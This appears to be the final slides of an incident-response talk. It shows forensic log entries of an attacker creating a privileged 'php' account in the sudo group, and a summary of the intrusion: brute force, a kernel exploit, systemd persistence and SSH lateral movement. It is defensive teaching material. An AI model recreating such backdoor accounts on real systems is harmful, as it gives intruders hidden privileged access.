  2019-10-05 13:06:..  Log File        525608   [useradd pid: 2525] add 'php' to shadow group 'sudo'
  2019-10-05 13:06:..  Log File        525608   [useradd pid: 2525] new group: name=php GID=999
  2019-10-05 13:06:..  Log File        525608   [useradd pid: 2525] new user: name=php UID=999 GID=999 home=/usr/php shell=/bin/bash
  2019-10-05 13:06:..  Log File        525608   [sudo] root : TTY=pts/0 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/useradd -d /usr/php -m --system --she...

(UID/GID 999 and the 13:06:38 timestamp match the debugfs stat of the /usr/php directory shown earlier.)
Story of Case #2

X Compromise was due to weak credentials
o Successful bruteforce
X Privilege escalation using a kernel vulnerability (CVE-2017-16995)
X Systemd service was installed after gaining root
X Lateral movement to other systems using public keys (SSH)

THANKS!
Any questions?
You can find me at @binaryz0ne

Credits & References...

Special thanks to all the people who made and released these awesome resources for free:
X Presentation template by SlidesGo
X Adam, Ideas and Blue Team Fingers, @Hexacorn
X Florian Roth, Sigma Rules and others, @cyb3rops
X Velociraptor, hayabusa, chainsaw, NirSoft, etc
X MITRE Framework, https://attack.mitre.org/techniques/
Sorry if we missed someone!